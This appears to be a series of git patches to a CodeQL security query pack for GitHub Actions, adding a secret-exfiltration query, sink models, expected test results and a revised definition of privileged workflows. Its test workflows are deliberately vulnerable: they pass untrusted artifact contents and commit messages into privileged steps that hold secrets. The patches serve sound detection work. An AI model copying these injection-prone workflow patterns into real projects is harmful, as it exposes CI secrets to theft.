.github/workflows/test4.yml:25:9:31:6 | Run Step | +| .github/workflows/test4.yml:32:19:32:56 | github.event.pull_request.title | .github/workflows/test4.yml:31:9:37:6 | Run Step | +| .github/workflows/test4.yml:38:19:38:56 | github.event.pull_request.title | .github/workflows/test4.yml:37:9:45:6 | Run Step | nodes | .github/workflows/sonar-source.yml:17:9:37:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | semmle.label | Run Step | @@ -18,6 +20,10 @@ nodes | .github/workflows/test4.yml:22:19:22:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/test4.yml:25:9:31:6 | Run Step | semmle.label | Run Step | | .github/workflows/test4.yml:26:19:26:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:31:9:37:6 | Run Step | semmle.label | Run Step | +| .github/workflows/test4.yml:32:19:32:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test4.yml:37:9:45:6 | Run Step | semmle.label | Run Step | +| .github/workflows/test4.yml:38:19:38:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | subpaths #select | .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | .github/workflows/sonar-source.yml:17:9:37:6 | Uses Step | .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/sonar-source.yml:39:9:45:6 | Run Step | Run Step | @@ -27,3 +33,5 @@ subpaths | .github/workflows/test3.yml:39:7:44:4 | Run Step | .github/workflows/test3.yml:24:7:31:4 | Uses Step | .github/workflows/test3.yml:39:7:44:4 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test3.yml:39:7:44:4 | Run Step | Run Step | | .github/workflows/test4.yml:21:9:25:6 | Run Step | .github/workflows/test4.yml:22:19:22:56 | github.event.pull_request.title | .github/workflows/test4.yml:21:9:25:6 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:21:9:25:6 | Run Step | Run Step | | .github/workflows/test4.yml:25:9:31:6 | Run Step | .github/workflows/test4.yml:26:19:26:56 | github.event.pull_request.title | .github/workflows/test4.yml:25:9:31:6 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:25:9:31:6 | Run Step | Run Step | +| .github/workflows/test4.yml:31:9:37:6 | Run Step | .github/workflows/test4.yml:32:19:32:56 | github.event.pull_request.title | .github/workflows/test4.yml:31:9:37:6 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:31:9:37:6 | Run Step | Run Step | +| .github/workflows/test4.yml:37:9:45:6 | Run Step | .github/workflows/test4.yml:38:19:38:56 | github.event.pull_request.title | .github/workflows/test4.yml:37:9:45:6 | Run Step | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:37:9:45:6 | Run Step | Run Step | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected index bf515674d90..c9f814139a0 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected @@ -2,7 +2,8 @@ edges | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | -| .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:20:9:24:6 | Run Step: pr [id] | +| .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:20:9:24:6 | Run Step: pr | +| .github/workflows/artifactpoisoning1.yml:20:9:24:6 | Run Step: pr | .github/workflows/artifactpoisoning1.yml:20:9:24:6 | Run Step: pr [id] | | .github/workflows/artifactpoisoning1.yml:20:9:24:6 | Run Step: pr [id] | .github/workflows/artifactpoisoning1.yml:34:67:34:92 | steps.pr.outputs.id | | .github/workflows/artifactpoisoning2.yml:13:9:19:6 | Uses Step: pr | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | @@ -74,6 +75,7 @@ nodes | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | semmle.label | env.ISSUE_TITLE | | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | semmle.label | steps.remove_quotations.outputs.replaced | | .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning1.yml:20:9:24:6 | Run Step: pr | semmle.label | Run Step: pr | | .github/workflows/artifactpoisoning1.yml:20:9:24:6 | Run Step: pr [id] | semmle.label | Run Step: pr [id] | | .github/workflows/artifactpoisoning1.yml:34:67:34:92 | steps.pr.outputs.id | semmle.label | steps.pr.outputs.id | | .github/workflows/artifactpoisoning2.yml:13:9:19:6 | Uses Step: pr | semmle.label | Uses Step: pr | diff --git a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected index 6ba7a1c714a..35b27172db6 100644 --- a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected @@ -2,7 +2,8 @@ edges | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | -| .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:20:9:24:6 | Run Step: pr [id] | +| .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:20:9:24:6 | Run Step: pr | +| .github/workflows/artifactpoisoning1.yml:20:9:24:6 | Run Step: pr | .github/workflows/artifactpoisoning1.yml:20:9:24:6 | Run Step: pr [id] | | .github/workflows/artifactpoisoning1.yml:20:9:24:6 | Run Step: pr [id] | .github/workflows/artifactpoisoning1.yml:34:67:34:92 | steps.pr.outputs.id | | .github/workflows/artifactpoisoning2.yml:13:9:19:6 | Uses Step: pr | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | @@ -74,6 +75,7 @@ nodes | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | semmle.label | env.ISSUE_TITLE | | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | semmle.label | steps.remove_quotations.outputs.replaced | | .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning1.yml:20:9:24:6 | Run Step: pr | semmle.label | Run Step: pr | | .github/workflows/artifactpoisoning1.yml:20:9:24:6 | Run Step: pr [id] | semmle.label | Run Step: pr [id] | | .github/workflows/artifactpoisoning1.yml:34:67:34:92 | steps.pr.outputs.id | semmle.label | steps.pr.outputs.id | | .github/workflows/artifactpoisoning2.yml:13:9:19:6 | Uses Step: pr | semmle.label | Uses Step: pr | From e45010ec5bdcbff5f5136b85cb75ae1a7d1e8e0d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 12 Apr 2024 13:07:54 +0200 Subject: [PATCH 0172/1267] Add Secret exfiltration query --- .../security/SecretExfiltrationQuery.qll | 22 ++++++++ ...rSource_sonarcloud-github-action.model.yml | 7 +++ ql/src/Security/CWE-200/SecretExfiltration.ql | 22 ++++++++ .../CWE-200/.github/workflows/test1.yml | 50 +++++++++++++++++++ .../CWE-200/SecretExfiltration.expected | 22 ++++++++ .../Security/CWE-200/SecretExfiltration.qlref | 2 + 6 files changed, 125 insertions(+) create mode 100644 ql/lib/codeql/actions/security/SecretExfiltrationQuery.qll create mode 100644 ql/lib/ext/SonarSource_sonarcloud-github-action.model.yml create mode 100644 ql/src/Security/CWE-200/SecretExfiltration.ql create mode 100644 ql/test/query-tests/Security/CWE-200/.github/workflows/test1.yml create mode 100644 ql/test/query-tests/Security/CWE-200/SecretExfiltration.expected create mode 100644 ql/test/query-tests/Security/CWE-200/SecretExfiltration.qlref diff --git a/ql/lib/codeql/actions/security/SecretExfiltrationQuery.qll b/ql/lib/codeql/actions/security/SecretExfiltrationQuery.qll new file mode 100644 index 00000000000..1886af435cf --- /dev/null +++ b/ql/lib/codeql/actions/security/SecretExfiltrationQuery.qll @@ -0,0 +1,22 @@ +private import actions +private import codeql.actions.TaintTracking +private import codeql.actions.dataflow.ExternalFlow +import codeql.actions.dataflow.FlowSources +private import codeql.actions.security.ArtifactPoisoningQuery +import codeql.actions.DataFlow + +private class SecretExfiltrationSink extends DataFlow::Node { + SecretExfiltrationSink() { externallyDefinedSink(this, "secret-exfiltration") } +} + +/** + * A taint-tracking configuration for untrusted data that reaches a sink where it may lead to secret exfiltration + */ +private module SecretExfiltrationConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } + + predicate isSink(DataFlow::Node sink) { sink instanceof SecretExfiltrationSink } +} + +/** Tracks flow of unsafe user input that is used in a context where it may lead to a secret exfiltration. */ +module SecretExfiltrationFlow = TaintTracking::Global; diff --git a/ql/lib/ext/SonarSource_sonarcloud-github-action.model.yml b/ql/lib/ext/SonarSource_sonarcloud-github-action.model.yml new file mode 100644 index 00000000000..0220f0d54d8 --- /dev/null +++ b/ql/lib/ext/SonarSource_sonarcloud-github-action.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["SonarSource/sonarcloud-github-action", "*", "input.args", "secret-exfiltration", "manual"] + diff --git a/ql/src/Security/CWE-200/SecretExfiltration.ql b/ql/src/Security/CWE-200/SecretExfiltration.ql new file mode 100644 index 00000000000..a6d1c18b733 --- /dev/null +++ b/ql/src/Security/CWE-200/SecretExfiltration.ql @@ -0,0 +1,22 @@ +/** + * @name Secret exfiltration + * @description Secrets may be exfiltrated by an attacker who can control the data sent to an external service. + * @kind path-problem + * @problem.severity error + * @security-severity 9.0 + * @precision high + * @id actions/secret-exfiltration + * @tags actions + * security + * external/cwe/cwe-200 + */ + +import actions +import codeql.actions.security.SecretExfiltrationQuery +import SecretExfiltrationFlow::PathGraph + +from SecretExfiltrationFlow::PathNode source, SecretExfiltrationFlow::PathNode sink +where SecretExfiltrationFlow::flowPath(source, sink) +select sink.getNode(), source, sink, + "Potential secret exfiltration in $@, which may be be leaked to an attacker-controlled resource.", + sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/test/query-tests/Security/CWE-200/.github/workflows/test1.yml b/ql/test/query-tests/Security/CWE-200/.github/workflows/test1.yml new file mode 100644 index 00000000000..21e7aac4768 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-200/.github/workflows/test1.yml @@ -0,0 +1,50 @@ +name: Sonar Code Coverage Upload +on: + workflow_run: + workflows: ["Build/Test"] + types: [completed] +jobs: + sonar: + name: Sonar + runs-on: ubuntu-latest + if: github.event.workflow_run.conclusion == 'success' + steps: + - name: 'Download code coverage' + uses: actions/github-script@v7 + with: + script: | + let allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({ + owner: context.repo.owner, + repo: context.repo.repo, + run_id: context.payload.workflow_run.id, + }); + let matchArtifact = allArtifacts.data.artifacts.filter((artifact) => { + return artifact.name == "oc-code-coverage" + })[0]; + let download = await github.rest.actions.downloadArtifact({ + owner: context.repo.owner, + repo: context.repo.repo, + artifact_id: matchArtifact.id, + archive_format: 'zip', + }); + let fs = require('fs'); + fs.writeFileSync(`${process.env.GITHUB_WORKSPACE}/oc-code-coverage.zip`, Buffer.from(download.data)); + - name: 'Unzip code coverage' + run: unzip oc-code-coverage.zip -d coverage + - name: set env vars + run: | + echo "SONAR_PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV + echo "SONAR_BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV + echo "SONAR_HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV + - name: SonarCloud Scan (PR) + uses: sonarsource/sonarcloud-github-action@master + if: env.SONAR_HEAD != 'develop' + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + SONAR_TOKEN: ${{ secrets.SONAR_TOKEN }} + with: + args: > + -Dsonar.scm.revision=${{ github.event.workflow_run.head_sha }} + -Dsonar.pullrequest.key=${{ env.SONAR_PR_NUM }} + -Dsonar.pullrequest.branch=${{ env.SONAR_HEAD }} + -Dsonar.pullrequest.base=${{ env.SONAR_BASE }} diff --git a/ql/test/query-tests/Security/CWE-200/SecretExfiltration.expected b/ql/test/query-tests/Security/CWE-200/SecretExfiltration.expected new file mode 100644 index 00000000000..3fbc081a0f4 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-200/SecretExfiltration.expected @@ -0,0 +1,22 @@ +edges +| .github/workflows/test1.yml:8:5:50:59 | Job: sonar [SONAR_BASE] | .github/workflows/test1.yml:47:11:50:59 | env.SONAR_BASE | +| .github/workflows/test1.yml:8:5:50:59 | Job: sonar [SONAR_HEAD] | .github/workflows/test1.yml:47:11:50:59 | env.SONAR_HEAD | +| .github/workflows/test1.yml:8:5:50:59 | Job: sonar [SONAR_PR_NUM] | .github/workflows/test1.yml:47:11:50:59 | env.SONAR_PR_NUM | +| .github/workflows/test1.yml:12:9:32:6 | Uses Step | .github/workflows/test1.yml:34:9:39:6 | Run Step | +| .github/workflows/test1.yml:34:9:39:6 | Run Step | .github/workflows/test1.yml:8:5:50:59 | Job: sonar [SONAR_BASE] | +| .github/workflows/test1.yml:34:9:39:6 | Run Step | .github/workflows/test1.yml:8:5:50:59 | Job: sonar [SONAR_HEAD] | +| .github/workflows/test1.yml:34:9:39:6 | Run Step | .github/workflows/test1.yml:8:5:50:59 | Job: sonar [SONAR_PR_NUM] | +nodes +| .github/workflows/test1.yml:8:5:50:59 | Job: sonar [SONAR_BASE] | semmle.label | Job: sonar [SONAR_BASE] | +| .github/workflows/test1.yml:8:5:50:59 | Job: sonar [SONAR_HEAD] | semmle.label | Job: sonar [SONAR_HEAD] | +| .github/workflows/test1.yml:8:5:50:59 | Job: sonar [SONAR_PR_NUM] | semmle.label | Job: sonar [SONAR_PR_NUM] | +| .github/workflows/test1.yml:12:9:32:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/test1.yml:34:9:39:6 | Run Step | semmle.label | Run Step | +| .github/workflows/test1.yml:47:11:50:59 | env.SONAR_BASE | semmle.label | env.SONAR_BASE | +| .github/workflows/test1.yml:47:11:50:59 | env.SONAR_HEAD | semmle.label | env.SONAR_HEAD | +| .github/workflows/test1.yml:47:11:50:59 | env.SONAR_PR_NUM | semmle.label | env.SONAR_PR_NUM | +subpaths +#select +| .github/workflows/test1.yml:47:11:50:59 | env.SONAR_BASE | .github/workflows/test1.yml:12:9:32:6 | Uses Step | .github/workflows/test1.yml:47:11:50:59 | env.SONAR_BASE | Potential secret exfiltration in $@, which may be be leaked to an attacker-controlled resource. | .github/workflows/test1.yml:47:11:50:59 | env.SONAR_BASE | ${{ env.SONAR_BASE }} | +| .github/workflows/test1.yml:47:11:50:59 | env.SONAR_HEAD | .github/workflows/test1.yml:12:9:32:6 | Uses Step | .github/workflows/test1.yml:47:11:50:59 | env.SONAR_HEAD | Potential secret exfiltration in $@, which may be be leaked to an attacker-controlled resource. | .github/workflows/test1.yml:47:11:50:59 | env.SONAR_HEAD | ${{ env.SONAR_HEAD }} | +| .github/workflows/test1.yml:47:11:50:59 | env.SONAR_PR_NUM | .github/workflows/test1.yml:12:9:32:6 | Uses Step | .github/workflows/test1.yml:47:11:50:59 | env.SONAR_PR_NUM | Potential secret exfiltration in $@, which may be be leaked to an attacker-controlled resource. | .github/workflows/test1.yml:47:11:50:59 | env.SONAR_PR_NUM | ${{ env.SONAR_PR_NUM }} | diff --git a/ql/test/query-tests/Security/CWE-200/SecretExfiltration.qlref b/ql/test/query-tests/Security/CWE-200/SecretExfiltration.qlref new file mode 100644 index 00000000000..cd179c0f1e6 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-200/SecretExfiltration.qlref @@ -0,0 +1,2 @@ +Security/CWE-200/SecretExfiltration.ql + From 25eace71bf1d327464b57db88cfaabc5f27d82d8 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 12 Apr 2024 13:08:41 +0200 Subject: [PATCH 0173/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index f5b3952ce96..ff8e02aa63e 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.10 +version: 0.0.11 dependencies: codeql/controlflow: "*" codeql/dataflow: "*" diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 7c1cc78df4a..c769ea06d0b 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.10 +version: 0.0.11 groups: - actions - queries From 9ecda65e32762519d4c2d89b309cb8a6532b7073 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 16 Apr 2024 11:41:53 +0200 Subject: [PATCH 0174/1267] Update Priv workflow definition --- ql/lib/codeql-pack.lock.yml | 16 ---- ql/lib/codeql/actions/Ast.qll | 13 ++- .../.github/workflows/documentation.yml | 87 +++++++++++++++++++ .../CWE-078/CommandInjection.expected | 1 + .../PrivilegedCommandInjection.expected | 2 + .../CWE-094/.github/workflows/inter-job4.yml | 2 +- .../Security/CWE-094/CodeInjection.expected | 2 + .../CWE-094/PrivilegedCodeInjection.expected | 2 - 8 files changed, 102 insertions(+), 23 deletions(-) delete mode 100644 ql/lib/codeql-pack.lock.yml create mode 100644 ql/test/query-tests/Security/CWE-078/.github/workflows/documentation.yml diff --git a/ql/lib/codeql-pack.lock.yml b/ql/lib/codeql-pack.lock.yml deleted file mode 100644 index 56f10b81e0c..00000000000 --- a/ql/lib/codeql-pack.lock.yml +++ /dev/null @@ -1,16 +0,0 @@ ---- -lockVersion: 1.0.0 -dependencies: - codeql/controlflow: - version: 0.1.7 - codeql/dataflow: - version: 0.1.7 - codeql/ssa: - version: 0.2.7 - codeql/typetracking: - version: 0.2.7 - codeql/util: - version: 0.2.7 - codeql/yaml: - version: 0.2.7 -compiled: false diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index edee4d03eb4..7e1bfdee589 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -208,19 +208,21 @@ class Workflow extends AstNode instanceof WorkflowImpl { predicate hasSingleTrigger(string trigger) { this.getATriggerEvent() = trigger and - count(string t | this.getATriggerEvent() = t | t) = 1 + count(this.getATriggerEvent()) = 1 } predicate isPrivileged() { // The Workflow has a permission to write to some scope - this.getPermissions().getAPermission() = "write" and + this.getPermissions().getAPermission() = "write" + or // The Workflow accesses a secret exists(SecretsExpression expr | expr.getEnclosingWorkflow() = this and not expr.getFieldName() = "GITHUB_TOKEN" ) or // The Workflow is triggered by an event other than `pull_request` - not this.hasSingleTrigger("pull_request") + count(this.getATriggerEvent()) = 1 and + not this.getATriggerEvent() = ["pull_request", "workflow_call"] or // The Workflow is only triggered by `workflow_call` and there is // a caller workflow triggered by an event other than `pull_request` @@ -228,8 +230,11 @@ class Workflow extends AstNode instanceof WorkflowImpl { exists(ExternalJob call, Workflow caller | call.getCallee() = this.getLocation().getFile().getRelativePath() and caller = call.getWorkflow() and - not caller.hasSingleTrigger("pull_request") + caller.isPrivileged() ) + or + // The Workflow has multiple triggers so at least one is ont "pull_request" + count(this.getATriggerEvent()) > 1 } } diff --git a/ql/test/query-tests/Security/CWE-078/.github/workflows/documentation.yml b/ql/test/query-tests/Security/CWE-078/.github/workflows/documentation.yml new file mode 100644 index 00000000000..46ffbce9628 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-078/.github/workflows/documentation.yml @@ -0,0 +1,87 @@ +name: Documentation + +on: + workflow_dispatch: + workflow_call: + +jobs: + parse_commit_info: + runs-on: ubuntu-latest + outputs: + can_deploy: ${{ steps.decide.outputs.can_deploy }} + deploy_to: ${{ steps.decide.outputs.deploy_to }} + + steps: + - name: Checkout Code + uses: actions/checkout@v4 + with: + fetch-depth: 0 + + - name: Copy build utils + run: | + cp -r .github/utils ../utils + + - name: Decide Whether to Build and/or Release + id: decide + run: | + set -xe + CAN_DEPLOY=$(python ../utils/please.py can_i_deploy_documentation) + DEPLOY_TO=$(python ../utils/please.py where_can_i_deploy_documentation) + + echo "can_deploy=$CAN_DEPLOY" >> $GITHUB_OUTPUT + echo "deploy_to=$DEPLOY_TO" >> $GITHUB_OUTPUT + echo github.ref ${{ github.ref }} + + build-documentation: + runs-on: ubuntu-latest + needs: parse_commit_info + + strategy: + matrix: + python-version: [3.11] + + steps: + - name: Checkout Code + uses: actions/checkout@v4 + + - name: Setup Python + uses: actions/setup-python@v5 + with: + python-version: ${{ matrix.python-version }} + + - name: Install Quarto + uses: quarto-dev/quarto-actions/setup@v2 + with: + version: pre-release + + - name: Install Package + shell: bash + run: | + make doc-deps + + - name: Environment Information + shell: bash + run: | + ls -la + ls -la doc + pip list + + - name: Build docs + shell: bash + run: | + pushd doc; make doc; popd + + - name: Environment Information + shell: bash + run: | + ls -la doc + cat doc/_variables.yml + ls -la doc/reference + + - name: Deploy to Documentation to a Branch + uses: JamesIves/github-pages-deploy-action@v4 + if: contains(needs.parse_commit_info.outputs.can_deploy, 'true') + with: + folder: doc/_site + branch: ${{ needs.parse_commit_info.outputs.deploy_to }} + commit-message: ${{ github.event.head_commit.message }} diff --git a/ql/test/query-tests/Security/CWE-078/CommandInjection.expected b/ql/test/query-tests/Security/CWE-078/CommandInjection.expected index 99ebb1edc05..ebbf2f7cf0b 100644 --- a/ql/test/query-tests/Security/CWE-078/CommandInjection.expected +++ b/ql/test/query-tests/Security/CWE-078/CommandInjection.expected @@ -1,5 +1,6 @@ edges nodes | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/documentation.yml:87:28:87:66 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | subpaths #select diff --git a/ql/test/query-tests/Security/CWE-078/PrivilegedCommandInjection.expected b/ql/test/query-tests/Security/CWE-078/PrivilegedCommandInjection.expected index 13d146a2570..8829557368b 100644 --- a/ql/test/query-tests/Security/CWE-078/PrivilegedCommandInjection.expected +++ b/ql/test/query-tests/Security/CWE-078/PrivilegedCommandInjection.expected @@ -1,6 +1,8 @@ edges nodes | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/documentation.yml:87:28:87:66 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | subpaths #select | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | Potential privileged command injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | ${{ github.event.comment.body }} | +| .github/workflows/documentation.yml:87:28:87:66 | github.event.head_commit.message | .github/workflows/documentation.yml:87:28:87:66 | github.event.head_commit.message | .github/workflows/documentation.yml:87:28:87:66 | github.event.head_commit.message | Potential privileged command injection in $@, which may be controlled by an external user. | .github/workflows/documentation.yml:87:28:87:66 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job4.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job4.yml index aad2d171c1a..b964bb78dac 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job4.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job4.yml @@ -1,4 +1,4 @@ -jn: push +on: push jobs: job0: diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected index c9f814139a0..f242e0e9e68 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected @@ -234,4 +234,6 @@ nodes subpaths #select | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | ${{ steps.changed-files.outputs.all_changed_files }} | +| .github/workflows/changelog.yml:58:26:58:39 | env.log | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changelog.yml:58:26:58:39 | env.log | ${{ env.log }} | +| .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | .github/workflows/changelog_from_prt.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | ${{ env.log }} | | action1/action.yml:14:19:14:50 | github.event.comment.body | action1/action.yml:14:19:14:50 | github.event.comment.body | action1/action.yml:14:19:14:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | action1/action.yml:14:19:14:50 | github.event.comment.body | ${{ github.event.comment.body }} | diff --git a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected index 35b27172db6..ec9a5e5238a 100644 --- a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected @@ -236,8 +236,6 @@ subpaths | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | ${{steps.remove_quotations.outputs.replaced}} | | .github/workflows/artifactpoisoning1.yml:34:67:34:92 | steps.pr.outputs.id | .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:34:67:34:92 | steps.pr.outputs.id | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning1.yml:34:67:34:92 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | .github/workflows/artifactpoisoning2.yml:13:9:19:6 | Uses Step: pr | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | -| .github/workflows/changelog.yml:58:26:58:39 | env.log | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/changelog.yml:58:26:58:39 | env.log | ${{ env.log }} | -| .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | .github/workflows/changelog_from_prt.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | ${{ env.log }} | | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | ${{ github.event.comment.body }} | | 